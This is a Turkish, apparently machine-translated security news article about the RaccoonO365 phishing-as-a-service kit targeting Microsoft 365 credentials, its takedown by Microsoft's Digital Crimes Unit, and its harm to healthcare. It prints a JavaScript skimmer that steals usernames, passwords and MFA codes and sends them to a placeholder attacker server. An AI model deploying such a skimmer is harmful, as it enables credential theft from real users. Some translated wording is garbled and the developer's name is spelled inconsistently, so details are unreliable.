2014’ün ortalarından bu yana, siber suçlular, Microsoft 365 kimlik bilgilerini ölçekte toplamak için Raccoono365 olarak bilinen abonelik tabanlı bir kimlik avı platformundan yararlandı.
Refefet dışı bir hizmet olarak ortaya çıkan Raccoono365, tehdit aktörlerinin resmi Microsoft iletişimlerini taklit ederek ikna edici kimlik avı kampanyalarını dağıtmasına izin veren minimum teknik beceri gerektirir.
Bu kitler, alıcıları kullanıcı adlarını, şifreleri ve çok faktörlü kimlik doğrulama (MFA) kodlarını dini yapmak için Microsoft markalaşmasını, e-posta şablonlarını ve oturum açma portallarını çoğaltır.
Eylül 2025 itibariyle, bu operasyon 94 ülkede 5.000’den fazla hesabı etkiledi ve metalaştırılmış sosyal mühendislik araçlarının ortaya koyduğu yaygın riski gösterdi.
Koordineli bir yasal işlemde, Microsoft’un Dijital Suç Birimi (DCU), Raccoono365’in dağılımını kolaylaştıran ve platformun temel altyapısını etkili bir şekilde sökerek New York’un Güney Bölgesi’nden bir mahkeme emri aldı.
Microsoft analistleri, şimdi MFA korumalarını altüst eden ve günde 9.000 hedefe kadar olan oranlarda kimlik bilgisi hasatını otomatikleştiren özelliklere sahip olan bu hizmetin hızlı evrimini kaydetti.
Ele geçirilen alanlar, abonelerin yeni saldırılar başlatma yeteneğini sakatlayarak abonelik yönetimi için hem kimlik avı ana bilgisayarları hem de komut ve kontrol arayüzleri olarak hizmet etti.
Her ne kadar çalınan tüm kimlik bilgileri doğrudan ağ müdahaleleri ile sonuçlanmasa da, yüksek değerli sektörler, özellikle sağlık hizmetleri üzerindeki etki şiddetliydi.
En az 20 ABD sağlık kuruluşu, başarılı Raccoono365 kimlik avı denemelerini takiben gecikmiş hasta bakımı, tehlikeye atılmış laboratuvar sonuçları ve veri ihlallerini bildirdi.
Microsoft’un Sağlık-ISAC ile ortaklığı, çalınan kimlik bilgileri genellikle sonraki kötü amaçlı yazılım veya fidye yazılımı dağıtımları için başlangıç erişim puanları olarak hizmet ettiği için kamu güvenliği sonuçlarının altını çizdi.
DCU’nun hızlı müdahalesi, kötü niyetli aktörleri güçlendiren düşük bariyer araçlara karşı yasal ve teknik karşı önlemlerin gerekliliğini göstermektedir.
Microsoft analistleri, Nijerya merkezli bir geliştirici olan Joshua Ogunipe’i Raccoono365’in baş mimarı olarak tanımladı.
Araştırmacılar, bir kripto para cüzdanını ortaya çıkaran bir operasyonel güvenlik atlaması sayesinde, abonelik ödemelerinde 100.000 ABD Doları’nın üzerinde izledi.
850’den fazla üye olan Ogundipe’in Telegram kanalı, hem standart kimlik avı kitlerini hem de mızrak avlama etkinliğini iyileştirmek için tasarlanmış yeni tanıtılan “AI-posta” hizmetini tanıttı.
Bu ilişkilendirme, aerodinamik suç işletmelerinin asgari yük ile nasıl ölçeklenebileceğini ve savunucuları modüler tehdit hizmetlerini öngörmeye zorlayacağını vurgulamaktadır.
Enfeksiyon mekanizması derin dalış
Raccoono365’in enfeksiyon mekanizması dinamik form enjeksiyonu ve şeffaf yönlendirme taktikleri etrafında döner.
Bir kurban kötü niyetli bir bağlantıyı tıkladığında, tarayıcı Microsoft’un resmi portalını yansıtan bir tuzak giriş sayfasına yönlendirilir.
.webp)
Çalışma zamanında enjekte edilen küçük bir JavaScript snippet’i, giriş alanlarını yakalar ve kimlik bilgilerini saldırganın sunucusuna iletir:-
document.querySelector('form').addEventListener('submit', function(e) {
e.preventDefault();
let creds = {
user: document.getElementById('username').value,
pass: document.getElementById('password').value,
otp: document.getElementById('mfa').value
};
fetch('https://attacker-server.com/collect', {
method: 'POST',
body: JSON.stringify(creds),
headers: {'Content-Type': 'application/json'}
}).then(()=> window.location.href="https://login.microsoftonline.com");
});Bu kod, kullanıcıları meşru oturum açma sayfasına yönlendirirken, şüpheyi en aza indirirken kesintisiz veri açığa çıkmasını sağlar.
Gelişmiş operatörler, MFA istemlerini atlamak için oturumla yeniden kullanma ve başlık manipülasyonu kullanır.
.webp)
Otomatik e-posta dağıtımı ve AI güdümlü içerik varyasyonu ile birleştiğinde, bu enfeksiyon zinciri modern kimlik avı sofistikliğini örneklendirir ve katman savunmalarının ve kullanıcı farkındalığının kritik öneminin altını çizer.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free